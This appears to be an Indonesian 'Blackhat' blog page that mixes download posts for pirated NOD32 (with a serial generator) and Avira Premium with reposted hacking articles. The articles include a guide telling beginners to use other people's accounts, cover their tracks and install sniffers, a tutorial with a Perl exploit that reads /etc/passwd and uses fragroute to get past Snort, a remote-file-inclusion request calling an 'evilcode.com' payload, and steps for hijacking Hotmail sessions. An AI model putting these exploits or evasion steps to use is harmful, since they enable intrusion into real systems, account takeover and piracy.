Black Hat

Theme Blogspot version Blackhat Indonesia

Black Hat

Theme Blogspot version Blackhat Indonesia

Black Hat

Theme Blogspot version Blackhat Indonesia

Jumat, 06 April 2012

Download NOD32 v 5.94+Seri gen

 
Fitur NOD32 5.0:

· ThreatSense teknologi - sebuah dioptimalkan tunggal Ancaman Anti-mesin untuk menganalisis kode untuk mengidentifikasi perilaku berbahaya, seperti virus, spyware, adware, phishing dan lebih
· Analisis heuristik Tertandingi mampu menemukan ancaman malware baru yang muncul
· Powerfull teknologi PC emulasi virtual memungkinkan membongkar dan dekripsi dari semua jenis kemasan arsip dan
run-time
· Mampu membersihkan malware yang aktif berjalan di memori
· Melindungi pada titik-titik infiltrasi beberapa, termasuk HTTP, POP3, SMTP dan semua media lokal dan removable
· Menghapus infeksi dari file yang terkunci untuk menulis (misalnya, file DLL dimuat)
· Mencegah file yang terinfeksi dari dibuka dan dijalankan, dan memperingatkan pada penciptaan file yang terinfeksi
Automatic eksekusi pada startup sistem
· Mendukung beberapa lingkungan Terminal Server
· Mendukung pemindaian jaringan disk dipetakan

Apa yang Baru di NOD32 5.0.94.0:

· Perbaiki: masalah dengan instalasi pada selain lokasi default
· Perbaiki: masalah dengan re-aktivasi produk dalam kasus tidak ada koneksi internet
· Perbaiki: validasi data dalam dialog aktivasi
· Perbaiki: memeriksa tentang update baru PCU - bagian UI
· Fix: kecelakaan saat menampilkan gelembung GUI desktop yang
· Perbaiki: dihapus (disarankan) dari jendela aktivasi
· Perbaiki: Setup Parental Control dihapus dari Setup / Komputer Halaman
· Perbaiki: validasi data
· Perbaiki: link ke halaman pengaturan removable media
· Ditambahkan: dukungan untuk sumber daya distributor
· Ubah: Aplikasi ikon berubah
· Ubah: Sysrescue grafis diperbarui
· Ubah: tanggal hak cipta dikoreksi

Kalau udah bacanya dan tertarik download NOD32 pada link di bawah :

Cara download klik link di atas tunggu beberapa detik klik " SKIP AD"
 
 Download Anti Virus  NOD32 64bit
 
Dan Lihat Key NOD32 sampai 2017 "Di Sini"

Downloand Avira Premium 2012

Avira Premium 2012 12.0.0.865 Full Version
Avira Antivirus Premium 2012 12.0.0.865
Perlindungan terhadap virus, malware, adware, spyware, phishing.

     Aplikasi Avira AntiVir Premium ini dirancang untuk menjadi alat yang komprehensif dan fleksibel, Anda dapat mengandalkan aplikasi ini untuk melindungi komputer Anda dari virus, malware, program yang tidak diinginkan, dan bahaya lainnya.

Berikut ini adalah beberapa fitur dari "Avira Antivirus Premium 2012":
  • AntiVir stops all types of viruses
  • AntiAd/Spyware eliminates ad/spyware
  • AntiPhishing proactive protection against phising
  • AntiRootkit against hidden rootkit threats
  • AntiDrive-by prevents against downloading viruses when surfing
  • EmailScanner enhanced email protection
  • WebGuard protection against malicious websites
  • RescueSystem create a bootable rescue CD
  • QuickRemoval eliminate viruses at the push of a button
  • NetbookSupport for laptops with low resolution
Requirements:

· At least 100 MB of free hard disk memory space (more if using Quarantine for temporary storage)
· At least 192 MB RAM under Windows 2000/XP
· At least 512 MB RAM under Windows Vista
· For all installations: Windows Internet Explorer 6.0 or higher
· Administrator rights are required for the installation
download here

Rabu, 04 April 2012


Terbitan Online Kecoak Elektronik
http://k-elektronik.org



======================================
Menjadi UNIX Hacker
Oleh: LithErr - LithiumError (Kecoak Elektronik)
===================================================================================


Jadi kamu memutuskan untuk menjadi seorang hacker UNIX tapi kami nggak tau gimana mulainya?
Sebelum kamu benar-benar mulai, pastikan bahwa hal-hal berikut ini adalah jelas:
(Pastikan juga bahwa kamu mengerti, bahwa tidak ada satupun anggota 'Kecoak' yang mengklaim
diri sebagai 'hackers'. Bagi kami yang terpenting adalah eksplorasi dan eksploitasi, *grins*


[1] Hacking adalah kerja keras. Hacking bukanlah tempat bermain anak-anak yang hanya ingin
    mendapat 15 menit secara cuma-cuma. Kamu harus belajar bagaimana caranya mengoperasikan
    dan memprogram sebuah system. Kamu mesti ngeriset bagaimana mesin-mesin bereaksi dan
    membaca kode-kode asli. Ini adalah proses yang panjang dan sukar - inilah peringatan
    untuk kamu!

[2] Hacking adalah ilegal. Masuk ke jaringan komputer tanpa izin adalah ilegal, paling tidak
    di banyak negara (hanya Belanda dan Argentina kalo nggak salah yang belum punya hukum
    mengenai hacking. Belum aja, sih ... paling juga nanti akan ada.) Walaupun hanya log-on
    ke sebuah sustem dengan menggunakan account bukan milikmu adalah tindakan pidana yang bisa
    dikenakan hukuman. Sekali sang hakim menjatuhkan hukuman, maka hukuman tersebut akan
    dimasukkan ke data hidup / arsip kamu. Seluruh hidup kamu mungkin bisa terlantar karena
    hanya sedikit perusahaan yang bersedia menerima hacker sebagai karyawan. Ini serius.
    Apalagi di Indonesia. Jika kamu meng-hacking server milik pemerintah, bisa dijamin kamu akan
    amblas. Dan keluarga kamu nggak aman! Beberapa anggota kami nggak bisa balik lagi ke tanah
    air karena sudah dicekal, dan terakhir, pemerintah mulai menyelidiki asal-usul ChiKo dan
    mencari keluarganya di Indonesia.

[3] Hacking memerlukan banyak waktu. Kamu nggak mungkin cuman nge-hack selama setengah thun,
    terus berhenti dan istirahat selama tiga bulan, lalu kembali lagi. Waktu berjalan cepat di
    internet. Rilis baru UNIX, bug-bug baru, dan juga fix-fix nya. Sekali kamu ketinggalan jaman
    dengan eksploit data milikmu, kamu mesti mengemis-ngemis ke orang lain untuk memberikan
    barang-barang baru kepadamu, dan jika kamu melakukan hal tsb terlalu sering, mereka nggak
    akan begitu senang jadinya. 50% dari waktu hacking sebenarnya dihabiskan untuk mengumpulkan
    informasi. Bicaralah ke hacker-hacker lainnya, baca mailing lists dan newsgroups, jangan lupa
    situs-situs www dan ftp yang bagus.


Tapi apa motivasi kamu untuk secara benar-benar melakukan 'unix hacking'? Itu terserah kamu. Kamu
ingin menjadi salah satunya, maka pikirkan lagi mengapa kamu ingin menjadi salah satu unix hacker.
Lupakan film-film seperti "The Net" ataupun "Hackers" - film-film tsb BUKANLAH realita! Lupakan
mimpi-mimpi menjadi pahlawan, mengehack Pentagon atau HanKam dan menjadi cowok terseksi, mendapat
pacar-pacar yang cantik dan pada akhirnya bekerja untuk sebuah perusahaan keamanan sistem dengan gaji
berjibun ;o). Hal-hal tersebut BUKANLAH apa yang akan terjadi - jadi, pastikanlah bahwa alasan kamu
jelas, mengapa kamu ingin menjadi hacker dan apa yang kamu harapkan dari hacking. Bisakah kamu
bayangkan ibundamu tercinta, tersedu-sedu saat polisi datang untuk menahanmu?

Ingatlah peringatan-peringatan ini. Ini kami jadikan peringatan untuk memastikan bahwa kamu
menyadari apa yang kamu lakukan dan kamu ingin menjadi apa.

Catatan juga bahwa kami menulis petunjuk singkat ini sebab seringkali kami mendapat pertanyaan
dari banyak orang, "Gimana caranya supaya gue jadi jago nge-hack UNIX?" - dan dari waktu ke waktu
kami menjadi makin cape ngejawabinnya. Maka ... inilah dia jawaban-jawabannya. Jangan salahkan
kami atas ketidaklengkapan ataupun kesalahan- kami udah nggak peduli lagi dengan permintaan-permintaan
ngajarin nge-hack lewat jalan potong. Hanya yang paling tahan bantinglah yang bertahan - jadi,
cobalah mendapatkan sebanyak mungkin melalui teks ini jika kamu benar-benar masih pemula. Kami
sendiri masih belum pantas menyandang gelar "hacker" karena kami merasa masih jauh sekali tertinggal
oleh rekan-rekan kebangsaan lain dan kami masih selalu dalam proses mempelajari segalanya.


Gimana cara mulainya


[1] Kenalilah sang sistem - atau - gimana caranya kamu bisa menang rodeo tanpa belajar
    caranya menunggang kuda?

[2] Dapatkan distribusi unix. Cobalah mendapatkan Linux, FreeBSD, Solaris, Sinix dll. untuk PC
    kamu. Linux dan FreeBSD adalah sistem-sistem murah (kadang-kadang gratis!) yang berasal dari
    BSD, sedangkan Solaris dan Sinix adalah sistem-sistem mahal yang berasal dari System V.
    Tip: Carilah distribusi linux yang punya buku pegangan yang cukup bagus. Kamu mesti mempelajari
    bagaimana caranya mengoperasikan unix. Pelajarilah dasar-dasarnya, seperti mengganti direktori,
    perintah-perintah menyalin dan menghapus dan menggunakan program penyunting.

[3] Motivasi dirimu sendiri untuk secara benar-benar menggunakan UNIX. Gimana caranya memotivasi
    - itu terserah kamu sendiri. Mungkin dengan menggunakan databasi yang ada di distribusi unix
    kamu, membuat program dalam C untuk sekolah/universitas kamu, apa aja lah, yang jelas kamu
    mesti benar-benar menggunakan unix (seperti jamannya ngetik perintah di DOS dulu).

[4] Beli beberapa buku untuk menolong kamu. Diluar sana ada banyak, jadi, pergilah ke toko buku
    terkemuka, paling bagus didekat sebuah universitas, dimana banyak orang-orang yang bisa menolong
    memberitahukan buku-buku apa yang cukup baik mengenai unix. Buku-buku Nutshell terbitan O'reilly
    (dan terjemahannya) kami sukai, namun ini adalah opini pribadi. Kamu mungkin mau mulai dengan
    seri For Dummies terbitan IDG (banyak yang bahasa Indonesianya. Baca FAQ untuk judul-judul lain.

[5] Dapatkan internet account dengan PPP dan/atau akses shell (hubungi ISPmu). JANGAN SEKALI-KALI
    menge-hack atau bertukar informasi mengenai hacking (tanpa PGP) dengan menggunakan account milik
    kamu sendiri (atau account dibawah nama/alamat/telepon kamu!). Coba untuk mengkonfigurasikan PC
    unix kamu untuk menghubungkan diri ke Internet provider. Beberapa distribusi Linux dilengkapi
    dengan sebuah buku petunjuk dimana mereka menggambarkan gimana caranya untuk menyambungkan ke
    internet. Jika kamu sudah mengikuti 5 langkah tsb diatas dan mengetahui caranya mengoperasikan
    unix (ini akan makan waktu sekitar 2 - 8 minggu) maka kamu sebaiknya melanjutkan ke langkah
    berikutnya:

Pelajari Dasar-Dasarnya!

[6] Kembalilah ke toko buku, kali ini carilah buku-buku mengenai unix dan keamanan internet.
    Beberapa buku terbitan Elex Media membahas hal ini. Buku-buku berbahasa inggris antara lain
    "Practical Unix Security" oleh Garfinkel and Spafford. Pelajari masalah-masalah keamanan dasar,
    'holes' dan ciri-ciri apa yang ada di unix, dan kesalahan-kesalahan apa yang sering orang-orang
    lakukan.

[7] Cobalah untuk mendapatkan semua informasi dan file-file yang kamu bisa temukan di internet.
    Selidiki situs-situs www dan ftp dan gunakan mesin pencari. Berlangganlah ke mailing list mengenai
    keamanan yang cukup penting dan bacalah newsgroups yang mungkin bisa jadi penting. Tanya-tanya
    di sekeliling di IRC mengenai situs-situs yang bagus. berikut adalah situs-situs untuk permulaan:

                                        http://underground.org
                                      ftp://onyx.infonexus.com/

                       (*Catatan editor: karena tulisan ini ditulis sekitar tahun 1997
                        dan kedua situs tersebut sudah tidak aktif, makan silahkan
                        kunjungi situs berikut -- scut*)
                  
                           http://wks.uts.ohio-state.edu/unix_course/unix.html
                                  http://www.mcsr.olemiss.edu/unixhelp/


                         Dan tentu saja link-link di "Kecoak Elektronik" ;-)


                                        bugtraq mailing list ->
                                http://www.securityfocus.com/archive/1


[8] Baca dan analisa file-file hasil kumpulan kamu - dan jangan cuman dikumpulin aja.

Jika kata-kata seperti suid, buffer overflow, firewall, rdist, nis, nfs, dan SATAN sudah menjadi bukan
rahasia lagi bagi kamu dan kamu benar-benar mengetahui apa makna dan konsekwensi kata-kata tersebut,
...lanjutkan.


Mulai Hacking


[9] Dapatkan sebuah account yang bukan milikmu! Coba minta dari hacker yang kamu kenal/jumpai.
    Atau gunakan metode-metode yang ada di FAQ. Ingatlah: jangan coba-coba nge-hack dari account
    milik kamu sendiri!

[10] Dengan account ini kamu bisa mencoba untuk menge-hack sistem pertamamu. Coba eksploit-
     eksploitmu. Tapi ingatlah untuk selalu untuk menutupi jejak (artikel akan segera menyusul)
     supaya account ilegal milikmu tidak menjadi sejarah setelah baru sekali dipakai!

[11] Gunakan ypx, eksploit - eksploit remote sendmail, insecure NFS exports, dll untuk mendapatkan
     host-host lainnya. Kamu bisa menjadi benar-benar sukses dengan barang "lama" ini jika kamu
     menggunakan daftar host yang cukup besar dan skrip tulis/temukan (write/find) yang
     mengotomatisasi proses penge-test-an untuk kamu. Tapi dimana bisa ditemukan nama-nama host
     untuk membuat daftar host? Banyak kemungkinan. Coba irc, /etc/hosts, www, data analisis
     statistik dari akses-akses internet atau www, dll. Ini akan memberikan kamu banyak host dengan
     account-account yang ada.

[12] Instal sebuah sniffer jika keadaan sistem memungkinkan dan kamu membobol account 'root'!
     Account ini akan memperbolehkan kamu mengakses banyak account ke host-host baru. Jalankan
     skrip-skrip eksploit kamu. pada akhirnya paling tidak ada beberapa yang bisa digunakan.
     Lanjutkanlah.


Menjadi seorang Hacker

APPPA? Kamu udah berhasil nge-hack root di beberapa sistem - dan kamu masih belum juga seorang
"hacker"? Kenapa tuh? Seorang hacker bukanlah seseorang yang kerjanya menge-hack sebuah site, install
sebuah sniffer dan selanjutnya. Seorang hacker asli adalah seseorang yang ingin mengerti sebuah sistem,
mengetahui bagaimana sang sistem bereaksi, bersenang-senang mengambil alih kekuasaan di server tersebut
dan tertarik dalam menemukan bugs-bugs baru dan mengarang program-program kegunaan (tool utility) baru.
Yang cocok digambarkan diatas bisa dipanggil Columbus-nya Cyberspace.

[13[ Cobalah untuk berhubungan dengan hacker-hacker lainnya dan saling bertukar informasi, pengalaman,
     accounts, eksploits, dan file.

[14] Amati diskusi-diskusi di newsgroups, mailing lists, dan irc. Cobalah membaca RFC-RFC penting,
    pelajarilah C dan mulailah memprogram tools karyamu sendiri.

[15] Jangan kut-ikutan menjadi "31337" - kamu sendiri tahu bahwa kamu udah cukup keren hackingnya
     ("cool", gitu, bahasa Sunda-nya mah!) dan kamu nggak perlu untuk meyakinkan setiap orang bahwa
     kamu emang elit. Bertindaklah secara normal dan tolonglah orang-orang lain yang sekarang
     bertanya-tanya kepada kamu "gimana caranya supaya gue bisa nge-hack UNIX?"

[16] Jangan lelah. Tetaplah bertahan di kawasan per-hacking-an, selalu amati newsgroup dan mailing
     list dan teman teman, jangan berhenti ber-hacking ria.

Yah, segitulah dari kami, kawan-kawan, teks diatas kayaknya cukup untuk membuat para pendatang baru
tersedak mulutnya. Teks tsb emang singkat dan kotor, namun mempunyai apa yang diperlukan.




Ciao...
LithErr
Terbitan Online Kecoak Elektronik
======================================
 IP FRAGMENTATION FOR EVADING NIDS
======================================
Introduction
------------

IDS pada umumnya bekerja dilayer 2 OSI, ids menggunakan "raw traffic"
dari proses sniffing kemudian mencocokkannya dengan signature yang
dibuat oleh seorang admin. Jika ada kecocokan antara signature dengan raw tra
ffic hasil sniffing paket, ids memberikan alert/peringatan sebagai tanda
adanya proses intrusi ke sistem.

Seorang attacker dapat memfragmentasi paket IP/TCP menjadi bagian kecil
kemudian mengacak paket tersebut secara random untuk dikirim ke server
target, sedangkan server yang menjadi destination harus bertanggung jawab
dalam proses reassembly paket. Tentu saja dengan cara seperti ini attack
er dapat melewati monitoring ids karena tidak ada kecocokan pola packet
dengan signature ids.

Requirements
-------------

Pada tulisan ini penulis menggunakan dua buah mesin unix, mesin A adalah
mesin attacker beralamat 172.16.11.234 dilengkapi dengan "fragroute" dan
mesin T adalah mesin target yang beralamat 172.16.11.103 dilengkapi dengan
NIDS "snort" versi 2.6.0

IP Fragmentation Attack
------------------------

Penulis menggunakan sebuah contoh melewati ids yang memfilter attacking
terhadap hole mambo index.php remote file inclussion untuk menjelaskan
IP fragmentation attack. Berikut request HTTP untuk mengexploitasi hole
pada mambo website :

GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://evilcode.com/inject.txt?

(Advisory hole mambo di http://secunia.com/advisories/18935/)


Sebuah rule snort dibuat untuk mendeteksi adanya attacking menggunakan
hole mambo diatas. Berikut ini file rule.conf yang digunakan :

var HTTP_SERVER 172.16.11.103
alert tcp any any -> $HTTP_SERVER 80 (content: "index.php?_REQUEST=\
[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=\
http\://"; msg: "Attacking Website Using Remote File Inclussion in Mamboo";)

Jalankan snort dengan mode IDS untuk mendeteksi adanya malicious request

#snort -d -c rule.conf &

Saat seorang attacker merequest webserver dengan malicious request untuk meng
ekploitasi mambo, snort akan segera memberikan peringatan berikut:

#tail -f /var/log/snort/alert

[**] [1:0:0] Attacking Website Using Remote File Inclussion in Mamboo [**]
[Priority: 0]
08/11-13:31:41.222444 172.16.11.234:7205 -> 172.16.11.103:80
TCP TTL:64 TOS:0x10 ID:3625 IpLen:20 DgmLen:181 DF
***AP*** Seq: 0xAB4A2BB9  Ack: 0x9F5B3AE0  Win: 0x4000  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1886825653 577596608


Snort memberikan warning karena adanya kesamaan pola request HTTP dengan
rule yang digunakan oleh snort. Lalu bagaimana cara menghindari monitoring
snort?. Untuk menghindarinya seorang attacker dapat mengacak pola request
yang dikirim ke server. Salah satu cara yang bisa digunakan adalah dengan
memfragmentasi paket IP dan/atau TCP kemudian mengirimkannya secara acak
kepada target. Snort tidak mendeteksi adanya attacking karena tidak ada
kesamaan pola request dengan rule. Sistem target harus bertanggung jawab
dalam proses reassembly paket dan menjawab request attacker, sehingga attacker
dapat mengexploitasi target tanpa terdeteksi oleh snort. Penulis mengguna
kan fragroute untuk mengirimkan request HTTP terfragmentasi ke target dengan
rule frag.conf berikut :

ip_frag 8
order random
print

Rule diatas digunakan untuk memecah/memfragmentasi data dalam paket IP men
jadi 8 bytes dan mengirimkan fragmen - fragmen paket IP tersebut secara
acak kepada target. Untuk lebih jelasnya bagaimana membuat rule fragroute
silakan dibaca manualnya. (rule "print" tidak berhubungan dalam proses pe
ngiriman paket IP hanya untuk mencetak proses fragroute ke stdout). Jalan
kan fragroute di mesin attacker dengan target mesin 172.16.11.103.

#./fragroute -f frag.conf 172.16.11.103

Dengan menggunakan rule fragroute diatas paket data yang dikirim dalam frag
men - fragmen paket sebagai berikut : (Analisis paket menggunakan ethereal)

Original request

GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://evilcode.com/inject.txt?

Karena aturan di rule fragroute memfragmentasi paket menjadi 8 bytes request
menjadi :

GET /ind   ex.php?_   REQUEST[   option]=   com_cont   ent&_REQ   USET[Ite
--------   --------   --------   --------   --------   --------   --------
 frag-1     frag-2     frag-3     frag-4     frag-5     frag-6     frag-7


mid]=1&G   LOBALS=&   mosConfi   g_absolu   te_path=   http://e   vilcode.
--------   --------   --------   --------   --------   --------   --------
 frag-8     frag-9    frag-10    frag-11    frag-12    frag-13    frag-14


com/inje   ct.txt?
--------   -------
frag-15    frag-16


Kemudian karena rule fragroute "order random", paket IP yang terfragmentasi
tadi dikirim secara acak sehingga berbeda sekali dengan request aslinya.Se
telah dirandom, berdasar analisis ethereal paket IP yang dikirim menjadi seba
gai berikut :


ex.php?_   te_path=   mid]=1&G   mosConfi   ct.txt?    UEST[Ite   g_absolu
--------   --------   --------   --------   -------    --------   ---------
 frag-1     frag-2     frag-3     frag-4     frag-5     frag-6     frag-7


option]=   LOBALS=&   http://e   com_cont   vilcode.   ent&_REQ   GET /ind
--------   --------   --------   --------   --------   --------   --------
 frag-8     frag-9    frag-10    frag-11    frag-12    frag-13    frag-14


REQUEST[   com/inje
--------   --------
frag-15    frag-16


Okee... deghh kalo contoh diatas mungkin masih cukup mengambang, apalagi
Jika web attacking dilakukan lewat browser, dimungkinkan attacking ga
akan jalan jika paket IP di fragmentasi. Untuk menyederhanakan pemahaman
Web attacking dengan IP fragmentasi untuk melewati ids, berikut sebuah
PoC sederhana local file inclussion menggunakan socket perl :

TARGET
-------

TARGET WEB BER IP 172.16.11.234
Vulnerable File http://172.16.11.234/test/cmd.php

cmd.php seperti berikut :

<?php
        ini_set('allow_url_fopen', 'on');
        if(isset($_GET['cmd'])){
                $cmd=$_GET['cmd'];
                include "$cmd";
        }else{
                echo "cmd isn't set\n";
        }
?>


Mal Request Untuk ngedapetin /etc/passwd
http://172.16.11.234/test/cmd.php?cmd=../../../../../../../../../../etc/passwd

Snort Rule :

include classification.config
preprocessor frag2
alert tcp any any -> $HTTP_SERVERS 80 (content: "/etc/passwd"; msg: "/etc/passwd inclussion";\
classtype:attempted-admin; flow:established,to_server; rev:8;)

ATTACKER
---------

ATTCKER IP 172.16.11.119

Socket exploits pake perl sebagai berikut xplo.pl
#!/usr/bin/perl -w
print "PoC Evading NIDS via socket\n";

if(!$ARGV[0])
{
  print "Xplo Code by Ph03n1X || http://kecoak-elektronik.net/\n";
  print "Gunakan : $0 <target>\n\n";
  exit;
}

use IO::Socket;
$server = $ARGV[0];
$socket = new IO::Socket::INET(
Proto => "tcp",
PeerAddr => $server,
PeerPort => "80",
);

print $socket "GET /test/cmd.php?cmd=../../../../../../../../../../etc/passwd\r\nHTTP/1.1\r\nHost: $server\r\n\r\n\r\n";
while ( <$socket> ){
  print;
}
close $socket;


A. Attacking tanpa fragmentasi IP

ATTACKER
---------

[novice@attacker]$ perl xplo.pl 172.16.11.234
PoC Evading NIDS via socket
root:*:0:0:Charlie &:/root:/bin/bash
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
smmsp:*:25:25:Sendmail Message Submission Program:/nonexistent:/sbin/nologin
popa3d:*:26:26:POP3 Server:/var/empty:/sbin/nologin
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
uucp:*:66:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
www:*:67:67:HTTP Server:/var/www:/sbin/nologin
named:*:70:70:BIND Name Service Daemon:/var/named:/sbin/nologin
proxy:*:71:71:Proxy Services:/nonexistent:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
(edited n cencored by author)
[novice@attacker]$

TARGET
-------

# tail -f /var/log/snort/alert
[**] [1:0:8] /etc/passwd inclussion [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
11/05-16:32:31.870052 172.16.11.119:33529 -> 172.16.11.234:80
TCP TTL:64 TOS:0x0 ID:47591 IpLen:20 DgmLen:151 DF
***AP*** Seq: 0x8ECD818F  Ack: 0xFC1975FA  Win: 0x5B4  TcpLen: 32
TCP Options (3) => NOP NOP TS: 87046254 1680097719

B. Attacking Menggunakan Fragmentasi Request
Pada teknik berikut yang difragmentasi adalah paket TCP,

ATTACKER DI WINDOW 1
---------------------

[root@komputer19 fragroute-1.2]#cat f.conf
tcp_seg 8
order random
print
[root@komputer19 fragroute-1.2]# ./fragroute -f f.conf 172.16.11.234
fragroute: tcp_seg -> order -> print

Buka console baru

ATTACKER DI WINDOW 2
---------------------

[novice@komputer19 google]$ perl xplo.pl 172.16.11.234
PoC Evading NIDS via socket
root:*:0:0:Charlie &:/root:/bin/bash
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
smmsp:*:25:25:Sendmail Message Submission Program:/nonexistent:/sbin/nologin
popa3d:*:26:26:POP3 Server:/var/empty:/sbin/nologin
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
uucp:*:66:1:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
www:*:67:67:HTTP Server:/var/www:/sbin/nologin
named:*:70:70:BIND Name Service Daemon:/var/named:/sbin/nologin
proxy:*:71:71:Proxy Services:/nonexistent:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
(edited n cencored by author)
[novice@attacker]$

TARGET
-------

# tail -f /var/log/snort/alert
(kosong tidak ada alert)

Nah..., dengan teknik mengacak paket, ids bisa dihindari dan masih ada
beberapa teknik lain lagi yang bisa digunakan untuk menghindari ids namun
itu tugas anda untuk mencari referensi jika anda memang serius belajar
kemanan sistem komputer.

Reference
----------

1. http://www.sans.org/resources/idfaq/fragroute.php
2. http://seclists.org/lists/security-basics/2005/Apr/0015.html
3. http://www.monkey.org/~dugsong/fragroute/fragroute.8.txt
4. http://www.securityfocus.com/infocus/1577
5. Snort Documentation di http://snort.org



=============================================================================
Hackin' Hotmail
=============================================================================

Tulisan ini dibuat untuk para pemula, dan mereka lainnya yang selalu
pengen belajar.  Ini nih mah gak buat yang udah pengalaman yang udah tau.
Kecuali emang lagi pengen baca. =-)

Artikel ini berisi informasi mengenai Hotmail free internet based e-mail dan
bagaiman untuk mendapatkan access ke semua account lainnya (Yah ... tidak
semua sih =-P ).
               
==================
==Latar Belakang==
==================

Hotmail adalah sebuah i-mil system berbasis web.  Yang cgi-bin sebagai
sebuah gateway ke mesin-mesin lokal dimana semua password dan e-mail
di simpan.
Hotmail akan meminta kamu masukin login pada satu page dan password pada
page lainnya, Nah ini yang jadi kunci pertama dari metode buat nge'hack.
Ketika ada dalam account Hotmail, ada banyak pilihan, kayak reading mail,
deleting mail, dll
Nah pilihan terakhir adalah logout option, yang merupakan kunci kedua dari
metode nembus-in. Untuk itu kamu mesti tau user name dari subject/victim.
User name ini mah nama diawal tanda @ di alamat i-mil mereka, so
mudah aja didapat. Kamu juga musti make browser yang bisa nampilin source
code dari page yang sedang kamu liat. Yup, cuman itu yang dibutuhkan selain
subject nya mesti bloon bener, entah lupa pa gak peduli buat logout
sekali mereka udah masuk dalam system. Nah ini nih kunci buat
nge'hacknya!!!!!!
Pokoke gimana caranya supaya si-subject gak logout, terserah =-)
 ===========
==Caranye==
===========
 Sekarang langkah-langkah buat nge-hacknya ......
 //////////
langkah 1
/////////
 Langkah pertama adalah untuk mendapatkan username dari 'subject'
trus buka web browser ke http://www.hotmail.com dan login dengan user name
itu.
Pasti-in kalo kamu udah bener nulis username soalnye hotmail gak bakalan
ngasih tauk kalo kamu ngisinya gak bener, Hotmail akan me-log IP dari orang
yang memasukkan nama login yang salah.
 //////////
Langkah 2
/////////
 Sekarang liat source code dari password page yang kamu masukin. Pada URL box
browser kamu bakalan keliatan seperti ini ->
www.hotmail.com/cgi-bin/password.cgi
Liat source codenya. Cari yang pada souce code page tersebut, yang kayak ini :

<form name="passwordform" action="URL" method="POST" target="_top">

Nah itu tuh baris yang penting .... Nah ada sedikit cerita sedikit, sebelum
gue dilanjutin.
Sebelum ngasih tauk kamu bagaimana menggunakan satu baris tulisan pada source
code tsb, Gue ceritain sedikit mengenai teori dibalik metode nge'hack ini.
Soalnya 'gak ada artinya hacking, kalo kamu tidak tau bagaimana cara kerjanya.
don'tItulah maksud utama dari hackin', buat nyari tau bagaimana cara kerja
system.
Nah jadi ..., ketika kamu login ke hotmail, gateway cgi-bin bakalan nandai
bahwa kamu udah masuk ke systemnya.
Jadi jika kamu gak logout, dan kamu cuman ninggalin page tersebut, atawa cuman
matiin komputer-mu, system Hotmail 'gak tauk kalo kamu tuh udah 'cabut' dari
account-mu.  Oke, kembali pada 'tujuan' semula.
 Action "URL" pada tulisan sebelumnya merupakan lokasi dari account username.
Jadi setelah pemilik asli account udah loged in dan ngisi passwordnya
dia bakalan masuk ke page yang bunyinya URL box-nya kayak gini :
 http://suatu-nomer/cgi-bin//start/username/suatu-nomer
 //////////
Langkah 3
/////////
 Hmmmmm...funny thing, nomer tersebut merupakan nomer yang kita liat pada
source code dari password page.
Jadi setelah kamu punya URL box, kamu musti nulis itu pada URL box aja!!!!
Kamu gak bisa buka page tersebut dengan open button, atau gunain open command
karena ini intinya tulisan ini.  Jadi setelah kamu masuk  ke URL tersebut,
pencet enter, dan liat aja hotmail bakalan ngasih kamu acces lengkap
atas account dari subject Hotmail.
 Perlu diingat kalo nge'hack begini CUMAN bisa bekerja hanya kalo pemilik
account gak logout dari account-nya.
Dan juga, tolong punya sedikit belas kasihan pada si bloon malang di ujung
sana yang punya account, dan jangan menghapus pesan apapuns atau tindakan
nge'rusak lainnya. Be happy aja soalnya kamu UDAH bisa access ke account tsb,
abis itu tinggalin aja...
  
Chiao ...
 

FOXIT Reader

Siapa yang tidak kenal dengan Adobe Reader? Semua orang yang setiap harinya bekerja dengan komputer pasti pernah mengenalnya. Adobe reader adalah software terkenal buatan raksasa software Adobe yang biasa digunakan untuk membaca file PDF (portable document format).
Foxit Reader, Alternatif Software untuk Membaca File PDF Selain 
Adobe Reader Image
Jika anda sudah bosan dengan adobe reader, atau ingin mencoba sesuatu yang baru, anda bisa memanfaatkan Foxit Reader untuk membaca file PDF. Software ini tidak kalah menarik jika dibandingkan dengan adobe reder karena memiliki banyak fitur menarik. Bahkan (menurut pengalaman kami), foxit reader lebih baik ketimbang adobe reader.
Beberapa fitur menarik yang bisa anda dapat dari foxit reader yaitu :
  • File installer lebih kecil.
    Bagi yang punya koneksi internet lambat, ini menjadi solusi menarik karena anda tidak perlu meluangkan waktu yang banyak untuk mendownload foxit reader.
  • Bisa membuka banyak file dengan TAB.
    Jika anda menggunakan foxit reader untuk membaca beberapa file PDF sekaligus, anda bisa melihat di situ ada banyak tab yang terbuka. Seperti yang biasa anda lihat pada web browser mozilla firefox.
    Foxit Reader, Alternatif Software untuk Membaca File PDF Selain 
Adobe Reader Image
  • Berjalan lebih cepat.
    Karena file installernya kecil, maka hasil file installernya juga kecil. Tidak dibutuhkan waktu yang lama untuk membuka file PDF menggunakan foxit reader.
  • Lebih aman
    Foxit menyertakan fitur security pada pada plugin dari software. Dengan ini, program akan menkonfirmasi anda terlebih dahulu jika akan membuka sebuah link di internet. Solusi yang cerdas sebelum anda terjebak untuk membuka alat website yang terjangkit dengan malware atau spyware.
Jika ingin mencoba menggunakan foxit reader, download dan install di komputer windows anda sekarang juga. Semua bisa di dapat dengan gratis dari oficial website-nya. Jika anda rasa foxit reader tidak lebih baik dari PDF reader yang lain, anda tinggal meng-uninstall-nya dari komputer anda. Cukup mudah bukan?
Link download
== Pengenalan Celah keamanan pada Aplikasi Web berbasis PHP  ==

